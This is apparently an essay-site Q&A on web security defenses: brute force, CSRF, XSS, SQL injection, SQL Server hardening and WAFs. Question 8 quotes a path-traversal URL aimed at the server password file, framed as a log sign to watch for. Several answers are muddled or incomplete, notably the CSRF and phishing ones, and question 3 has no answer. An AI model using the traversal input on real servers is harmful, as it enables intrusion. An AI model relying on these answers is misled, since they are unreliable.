A limited time offer! Get a custom sample essay written according to your requirements urgent 3h delivery guaranteedOrder Now
1 What is brute force attack and how can the risks of these attacks be mitigated. It is a cryptanalytic attack that can be used against any encrypted data. It can be mitigated by choosing suitable passwords and putting in place lockouts that restrict access after x number of failed login attempts will significantly assist in reducing the risk of brute-force attacks.
2. Explain a scenario where a hacker may use Cross Site Request Forgery (CRFS) to perform authorized transactions. If you are on a bad site such as a bad movie upload page or a smut website the hacker can use that to pass false authorization.
3. What is the proper way to prevent XSS attack?
4. If an attacker wishes to place a phishing page on a website, what is a common vulnerability that can be exploited to successfully do this? Criminals often use social engineering along with vulnerabilities in applications such as web browsers or email clients to trick users into installing malicious code on their computer.
5. What can be the impact of a successful SQL injection?
A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database, and recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system.
6. What is the difference with a blind SQL injection attack from a normal SQL injection attack? The only difference being the way the data is retrieved from the database.
7. Why are stored XSS vulnerabilities a major risk for web applications Cross-Site Scripting is a type of injection problem in which malicious scripts (vb, js etc.) are into a trusted web site. XSS flaws occur whenever an application takes untrusted (typically user supplied) data and sends it invalidated to a web browser. XSS allows attackers to execute script in the victim’s browser and the malicious script can access any cookies, session tokens, or other sensitive information retained by our browser. Used with that site, they can even rewrite the content of the HTML page. It basically exploits the trust that a client browser has for the website.
8. What would the following url being quede in your web logs be an indication of http://www.testurl.com/ ../ ../ ../ ../ ../ ../ ../ etc/psddwd? Would be an indication of someone attempting to access your server’s password file.
9. How would you ensure security between a web application and an SQL server. Use secure authentication, such as Windows authentication, that does not send passwords over the network. Encrypt SQL Server authentication credentials. If you use SQL Server authentication, you can encrypt credentials automatically by installing a server certificate on the database server. Secure communication channels. Options include using Secure Sockets Layer (SSL) or Internet Protocol Security (IPSec). Use remote procedure call (RPC) encryption with Enterprise Services applications. Use a segmented network, which can isolate eavesdropping to compromised segments. Use the HttpChannel and SSL with .NET Remoting.
10. What is a benefit of using a web application firewall (WAF)? Application attacks can be stopped before reaching webserver by filtering traffic. A network infrastructure solution can be provided for a software security problem Resources normally dedicated to securing the code can be devoted to other security threats.